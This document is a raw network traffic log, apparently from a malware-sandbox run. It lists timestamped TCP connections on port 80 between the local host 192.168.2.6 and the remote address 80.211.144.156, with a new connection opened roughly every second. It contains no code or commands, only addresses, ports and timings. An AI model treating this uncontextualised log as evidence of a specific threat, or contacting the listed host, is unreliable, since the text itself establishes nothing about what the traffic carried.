                                    Aug 25, 2024 15:44:47.686918974 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.686970949 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.687988043 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.688057899 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.688256025 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.693038940 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.044972897 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.050785065 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.050798893 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.050807953 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.381426096 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.435432911 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.515692949 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.560478926 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.668858051 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.669600010 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.674187899 CEST804981980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.674500942 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:48.674700022 CEST4981980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.674720049 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.674869061 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.679663897 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.029845953 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.076081038 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.204603910 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.204881907 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.205096006 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.205106974 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.368427038 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.419815063 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.566720963 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.607279062 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.697293997 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.698234081 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.702629089 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.702680111 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.703110933 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.703174114 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.703299999 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.709157944 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.065424919 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.070658922 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.070676088 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.070686102 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.389305115 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.435422897 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.585814953 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.638657093 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.713963985 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.714989901 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.722027063 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.722079039 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.723768950 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.723851919 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.724037886 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.731298923 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.076299906 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.081496000 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.081515074 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.081523895 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.419457912 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.466804981 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.593199015 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.593430042 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.718858957 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.719099998 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.719799995 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.719814062 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.719945908 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.720071077 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.720071077 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.728435040 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.729629993 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.737142086 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.737232924 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.737345934 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.744725943 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.076334000 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.081335068 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.081456900 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.091742992 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.096745968 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.096759081 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.096775055 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.400051117 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.435131073 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.451030016 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.482285023 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.531572104 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.569750071 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.576029062 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.622960091 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.852638960 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.853029013 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.853437901 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.857928038 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.858023882 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.858297110 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.858355045 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.858505964 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.858577967 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.858716965 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.867607117 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.216969013 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.221919060 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.221931934 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.221942902 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.553256989 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.607316017 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.756934881 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.810451984 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.873157978 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.878474951 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.878544092 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.878699064 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.890471935 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.232433081 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.239167929 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.239187002 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.239197969 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.568727970 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.623054981 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.705913067 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.747981071 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.835617065 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.835973978 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.840898991 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.840962887 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.841303110 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.841373920 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.841490984 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.846329927 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.226845026 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.231865883 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.231880903 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.231889009 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.536597967 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.591696024 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.737406969 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.779258966 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.854275942 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.854562044 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.860100985 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.860169888 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.860313892 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.860363960 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.860450029 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.866018057 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.216856003 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.221990108 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.222006083 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.222023964 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.531467915 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.576035023 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.820089102 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.872889042 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.969436884 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.973608971 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.974152088 CEST4982980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.979037046 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.979096889 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.979126930 CEST804982980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.979187965 CEST4982980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.979315042 CEST4982980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.984155893 CEST804982980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.326267004 CEST4982980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.331254959 CEST804982980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.331326008 CEST804982980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.331336021 CEST804982980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.577377081 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.577604055 CEST4982980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.582403898 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.582484007 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.582565069 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.582707882 CEST804982980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.582758904 CEST4982980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.589828014 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.761713028 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.766772032 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:57.766880035 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.771492958 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:57.776340961 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.110150099 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.115144968 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.115174055 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.127824068 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.132733107 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.132805109 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.132816076 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.248658895 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.294770956 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.400324106 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.451026917 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.458197117 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.513537884 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.654808998 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.701148987 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.774749041 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.774807930 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.775480986 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.780881882 CEST804983080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.780896902 CEST804983180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.780916929 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:58.780956030 CEST4983080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.780965090 CEST4983180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.781014919 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.781116962 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:58.786016941 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.138873100 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.143882990 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.143897057 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.143908024 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.482914925 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.529203892 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.684032917 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.732326984 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.808659077 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.809333086 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.814280033 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.814346075 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.814471960 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.814568996 CEST804983280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:59.814615965 CEST4983280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:59.819739103 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.170234919 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.180674076 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.180710077 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.180737972 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.503534079 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.552262068 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.633838892 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.685463905 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.796574116 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.797475100 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.801939964 CEST804983380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.802431107 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:00.802504063 CEST4983380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.802542925 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.802685976 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:00.807943106 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.154418945 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:01.159557104 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.159641027 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.159671068 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.492856026 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.544826984 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:01.623974085 CEST804983480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.669859886 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:01.745973110 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:01.751147032 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:01.751245022 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:01.751338005 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:01.756616116 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.107609034 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.114398003 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.114540100 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.114550114 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.444463015 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.497891903 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.579654932 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.622929096 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.698582888 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.699306011 CEST4983680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.705451012 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.705528975 CEST4983680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.705542088 CEST804983580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:02.705631971 CEST4983580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.705707073 CEST4983680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:02.711420059 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.113044977 CEST4983680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.119098902 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.119110107 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.119221926 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.381527901 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.405376911 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.405594110 CEST4983680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.411547899 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.411643028 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.411807060 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.411820889 CEST804983680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.411957979 CEST4983680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.417651892 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.526067019 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.531204939 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.531331062 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.531424046 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.536447048 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.763684988 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.768676996 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.768692017 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.888775110 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:03.893887043 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.893914938 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:03.894365072 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:04.090265036 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:04.138570070 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:04.217706919 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:04.222702980 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:04.263525009 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:04.265034914 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:04.421305895 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:04.466824055 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:04.569571018 CEST4983480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.262887001 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.262960911 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.266745090 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.270164967 CEST804983780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.270200968 CEST804983880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.270215988 CEST4983780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.270243883 CEST4983880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.273123026 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.273190022 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.276043892 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.282506943 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.684885025 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:05.690201998 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.690217018 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.690227985 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:05.969763041 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.029169083 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.169203043 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.216681004 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.290970087 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.291764021 CEST4984080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.296925068 CEST804983980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.296971083 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.296991110 CEST4983980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.297045946 CEST4984080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.297163963 CEST4984080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.303208113 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.654211998 CEST4984080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:06.660233974 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.660248041 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:06.660257101 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.150520086 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.150948048 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.151000023 CEST804984080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.151031971 CEST4984080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:07.151057959 CEST4984080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:07.282998085 CEST4984180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:07.291064978 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.291261911 CEST4984180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:07.291388035 CEST4984180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:07.298609018 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.638686895 CEST4984180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:07.643816948 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.643832922 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:07.643841982 CEST804984180.211.144.156192.168.2.6
